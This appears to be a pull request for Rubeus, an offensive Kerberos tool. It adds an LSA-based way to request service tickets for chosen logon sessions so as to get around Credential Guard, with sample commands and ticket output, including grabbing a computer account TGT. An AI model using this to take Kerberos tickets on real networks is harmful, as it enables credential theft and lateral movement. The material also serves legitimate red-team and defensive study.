### PR TITLE
Add support for requesting TGS tickets via LSA to bypass Credential Guard

### DIFF
--- a/README.md
+++ b/README.md
@@ -568,6 +568,8 @@ Using a KDC proxy ([MS-KKDCP](https://docs.microsoft.com/en-us/openspecs/windows
 
 The `/keyList` flag was implemented for Kerberos [Key List Requests](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/732211ae-4891-40d3-b2b6-85ebd6f5ffff). These requests must utilise a forged partial TGT from a read-only domain controller in the `/ticket:BASE64|FILE.KIRBI` parameter, further details on this forged TGT in the [golden](#golden) section. Furthermore, the `/spn:x` field must be set to the KRBTGT SPN within the domain, eg. KRBTBT/domain.local.
 
+The **asktgs** action also supports requesting service tickets via the Kerberos authentication package using LSASS. This mode of operation can be enabled by omitting the `/ticket` argument. By default, the TGT associated with the current logon session is used.  An alternative logon session can be targetted by supplying the `/luid:xxx` argument.  Local administrator privileges are required when targetting other logon sessions. Currently, only simple service tickets can be requested via LSASS.  Arguments for features such as S4U2Self, U2U, key list and KDC proxy are ingnored.  Requesting service tickets via LSASS can often be more opsec friendly, since Kerberos traffic will originate from LSASS.  This mode is also required for scenarios where Credential Guard / Remote Credential Guard is active, since dumping TGT's with credential guard is not possible.      
+
 Requesting a TGT for dfm.a and then using that ticket to request a service ticket for the "LDAP/primary.testlab.local" and "cifs/primary.testlab.local" SPNs:
 
     C:\Rubeus>Rubeus.exe asktgt /user:dfm.a /rc4:2b576acbe6bcfda7294d6bd18041b8fe
@@ -950,6 +952,70 @@ Using PKINIT to request a TGT and then requesting a user-to-user service ticket 
           Signature            : 6CF688E02147BEEC168E0125 (UNVALIDATED)
 
 **Note The `/asrepkey` from the TGT retrival must be passed to decrypted the CredentialData section where the NTLM hash is stored but the `/servicekey` argument is not required here as the session key from the TGT is being used because it is a user-to-user request.
+
+Requesting a service ticket using the current logged on session:
+```
+Rubeus.exe asktgs /service:LDAP/dc.ghostpack.local /nowrap
+
+   ______        _
+  (_____ \      | |
+   _____) )_   _| |__  _____ _   _  ___
+  |  __  /| | | |  _ \| ___ | | | |/___)
+  | |  \ \| |_| | |_) ) ____| |_| |___ |
+  |_|   |_|____/|____/|_____)____/(___/
+
+  v2.3.3
+
+[*] Action: Ask TGS
+
+[=] Requesting service ticket via LSA authentication package 2 using handle 0x9625072
+[*] base64(ticket.kirbi):
+
+      doIGvDCCBrigAwIBBaEDAg(..snip..)
+
+  ServiceName              :  LDAP/dc.ghostpack.local
+  ServiceRealm             :  GHOSTPACK.LOCAL
+  UserName                 :  CCob (NT_PRINCIPAL)
+  UserRealm                :  GHOSTPACK.LOCAL
+  StartTime                :  25/02/2025 09:08:11
+  EndTime                  :  25/02/2025 18:48:39
+  RenewTill                :  03/03/2025 12:47:40
+  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
+  KeyType                  :  aes256_cts_hmac_sha1
+  Base64(key)              :  k2xUOHFN1Xg(...snip...)
+```
+
+Requesting local computer account TGT via renewal. Requires local administrator access.  If credential guard is present, ticket use will not be possible away from the host. 
+```
+Rubeus.exe asktgs /service:krbtgt/ghostpack.local /luid:0x3e7
+
+   ______        _
+  (_____ \      | |
+   _____) )_   _| |__  _____ _   _  ___
+  |  __  /| | | |  _ \| ___ | | | |/___)
+  | |  \ \| |_| | |_) ) ____| |_| |___ |
+  |_|   |_|____/|____/|_____)____/(___/
+
+  v2.3.3
+
+[*] Action: Ask TGS
+
+[=] Requesting service ticket via LSA authentication package 2 using handle 0x10441184
+[*] base64(ticket.kirbi):
+
+      doIGuTCCBrWg(...snip...)IFhb3MuZGV2
+
+  ServiceName              :  krbtgt/ghostpack.local
+  ServiceRealm             :  GHOSTPACK.LOCAL
+  UserName                 :  DC$ (NT_PRINCIPAL)
+  UserRealm                :  GHOSTPACK.LOCAL
+  StartTime                :  25/02/2025 09:18:37
+  EndTime                  :  25/02/2025 11:35:10
+  RenewTill                :  02/03/2025 10:35:06
+  Flags                    :  name_canonicalize, pre_authent, renewable, forwardable
+  KeyType                  :  aes256_cts_hmac_sha1
+  Base64(key)              :  k2xUOHFN1Xg(...snip...)
+```
 
 ### renew
 

--- a/Rubeus/Commands/Asktgs.cs
+++ b/Rubeus/Commands/Asktgs.cs
@@ -208,7 +208,10 @@ namespace Rubeus.Commands
             }
             else
             {
-                Ask.TGS(null, service, requestEnctype, outfile, ptt, dc, true, enterprise, false, opsec, tgs, targetDomain, servicekey, asrepkey, u2u, targetUser, printargs, proxyUrl, keyList, dmsa, serviceType, targetLuid);
+                if(arguments.ContainsKey("/user") || arguments.ContainsKey("/password") || arguments.ContainsKey("/dc") || arguments.ContainsKey("/u2u") || arguments.ContainsKey("/tgs"))
+                    Console.WriteLine("\r\n[X] A /ticket:X needs to be supplied!\r\n");
+                else
+                    Ask.TGS(null, service, requestEnctype, outfile, ptt, dc, true, enterprise, false, opsec, tgs, targetDomain, servicekey, asrepkey, u2u, targetUser, printargs, proxyUrl, keyList, dmsa, serviceType, targetLuid);
             }
         }
     }

--- a/Rubeus/Commands/Asktgs.cs
+++ b/Rubeus/Commands/Asktgs.cs
@@ -1,6 +1,7 @@
 ﻿using System;
 using System.Collections.Generic;
 using System.IO;
+using Rubeus.lib.Interop;
 
 
 namespace Rubeus.Commands
@@ -30,6 +31,17 @@ namespace Rubeus.Commands
             bool keyList = false;
             string proxyUrl = null;
             bool dmsa = false;
+            string serviceType = "srv_inst";
+
+            LUID targetLuid = new LUID();
+            if (arguments.ContainsKey("/luid")) {
+                try {
+                    targetLuid = new LUID(arguments["/luid"]);
+                } catch {
+                    Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/luid"]);
+                    return;
+                }
+            }
 
             if (arguments.ContainsKey("/keyList"))
             {
@@ -103,6 +115,10 @@ namespace Rubeus.Commands
                 return;
             }
 
+            if (arguments.ContainsKey("/servicetype")) {
+                serviceType = arguments["/servicetype"];
+            }
+
             if (arguments.ContainsKey("/servicekey")) {
                 servicekey = arguments["/servicekey"];
             }
@@ -174,14 +190,14 @@ namespace Rubeus.Commands
                 {
                     byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
                     KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
-                    Ask.TGS(kirbi, service, requestEnctype, outfile, ptt, dc, true, enterprise, false, opsec, tgs, targetDomain, servicekey, asrepkey, u2u, targetUser, printargs, proxyUrl, keyList, dmsa);
+                    Ask.TGS(kirbi, service, requestEnctype, outfile, ptt, dc, true, enterprise, false, opsec, tgs, targetDomain, servicekey, asrepkey, u2u, targetUser, printargs, proxyUrl, keyList, dmsa, serviceType, default);
                     return;
                 }
                 else if (File.Exists(kirbi64))
                 {
                     byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
                     KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
-                    Ask.TGS(kirbi, service, requestEnctype, outfile, ptt, dc, true, enterprise, false, opsec, tgs, targetDomain, servicekey, asrepkey, u2u, targetUser, printargs, proxyUrl, keyList, dmsa);
+                    Ask.TGS(kirbi, service, requestEnctype, outfile, ptt, dc, true, enterprise, false, opsec, tgs, targetDomain, servicekey, asrepkey, u2u, targetUser, printargs, proxyUrl, keyList, dmsa, serviceType, default);
                     return;
                 }
                 else
@@ -192,8 +208,7 @@ namespace Rubeus.Commands
             }
             else
             {
-                Console.WriteLine("\r\n[X] A /ticket:X needs to be supplied!\r\n");
-                return;
+                Ask.TGS(null, service, requestEnctype, outfile, ptt, dc, true, enterprise, false, opsec, tgs, targetDomain, servicekey, asrepkey, u2u, targetUser, printargs, proxyUrl, keyList, dmsa, serviceType, targetLuid);
             }
         }
     }

--- a/Rubeus/lib/Crypto.cs
+++ b/Rubeus/lib/Crypto.cs
@@ -1,11 +1,9 @@
 ﻿using System;
 using System.Linq;
-using System.Collections.Generic;
 using System.Runtime.InteropServices;
 using System.ComponentModel;
 
-namespace Rubeus
-{
+namespace Rubeus {
     public class Crypto
     {
         public static void ComputeAllKerberosPasswordHashes(string password, string userName = "", string domainName = "")
@@ -125,7 +123,7 @@ namespace Rubeus
             Interop.KERB_ECRYPT pCSystem;
             IntPtr pCSystemPtr;
 
-            if (eType == Interop.KERB_ETYPE.credGuard_blob)
+            if (eType == Interop.KERB_ETYPE.aes256_gcm_ghash_credguard)
                 throw new ArgumentException("Cannot decrypt Credential Guard blobs");
 
             
@@ -167,7 +165,7 @@ namespace Rubeus
             Interop.KERB_ECRYPT pCSystem;
             IntPtr pCSystemPtr;
 
-            if (eType == Interop.KERB_ETYPE.credGuard_blob)
+            if (eType == Interop.KERB_ETYPE.aes256_gcm_ghash_credguard)
                 throw new ArgumentException("Cannot encrypt Credential Guard blobs");
 
             // locate the crypto system

--- a/Rubeus/lib/Interop.cs
+++ b/Rubeus/lib/Interop.cs
@@ -1,13 +1,9 @@
 ﻿using System;
-using Asn1;
-using System.Text;
-using System.Collections.Generic;
 using System.Runtime.InteropServices;
 using Rubeus.lib.Interop;
 
 
-namespace Rubeus
-{
+namespace Rubeus {
     public class Interop
     {
         // constants
@@ -141,7 +137,7 @@ namespace Rubeus
             rc4_hmac_exp = 24,
             subkey_keymaterial = 65,
             old_exp = -135,
-            credGuard_blob = -180
+            aes256_gcm_ghash_credguard = -180
         }
 
         [Flags]
@@ -962,6 +958,11 @@ namespace Rubeus
             public UInt16 Length;
             public UInt16 MaximumLength;
             public string Buffer;
+            public LSA_STRING_IN(string value) {
+                Length = (ushort)value.Length;
+                MaximumLength = (ushort)(value.Length + 1);
+                Buffer = value;
+            }
         }
 
         [StructLayout(LayoutKind.Sequential)]

--- a/Rubeus/lib/krb_structures/TGS_REQ.cs
+++ b/Rubeus/lib/krb_structures/TGS_REQ.cs
@@ -3,6 +3,7 @@ using System;
 using System.Collections.Generic;
 using System.IO;
 using System.Net;
+using static Rubeus.Interop;
 
 namespace Rubeus
 {
@@ -20,7 +21,7 @@ namespace Rubeus
 
     public class TGS_REQ
     {
-        public static byte[] NewTGSReq(string userName, string domain, string sname, Ticket providedTicket, byte[] clientKey, Interop.KERB_ETYPE paEType, Interop.KERB_ETYPE requestEType = Interop.KERB_ETYPE.subkey_keymaterial, bool renew = false, string s4uUser = "", bool enterprise = false, bool roast = false, bool opsec = false, bool unconstrained = false, KRB_CRED tgs = null, string targetDomain = "", bool u2u = false, bool keyList = false, bool dmsa = false)
+        public static byte[] NewTGSReq(string userName, string domain, string sname, Ticket providedTicket, byte[] clientKey, Interop.KERB_ETYPE paEType, Interop.KERB_ETYPE requestEType = Interop.KERB_ETYPE.subkey_keymaterial, bool renew = false, string s4uUser = "", bool enterprise = false, bool roast = false, bool opsec = false, bool unconstrained = false, KRB_CRED tgs = null, string targetDomain = "", bool u2u = false, bool keyList = false, bool dmsa = false, string serviceType = null)
         {
             TGS_REQ req;
             if (u2u)
@@ -113,7 +114,7 @@ namespace Rubeus
                 }
                 else
                 {
-                    req.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_PRINCIPAL;
+                    req.req_body.sname.name_type = Helpers.StringToPrincipalType(serviceType); 
                     req.req_body.sname.name_string.Add(userName);
                 }
 


### PR DESCRIPTION
You can now request service tickets via LSA instead of the built int Rubeus method.  By providing just the `/service` argument and an optional `/luid` argument, you can now fetch service tickets through LSA.

When the `/luid` argument is missing, the current user context is used.  The context of the user running under the target LUID is used when supplied.  When targeting other users, elevated privileges are required.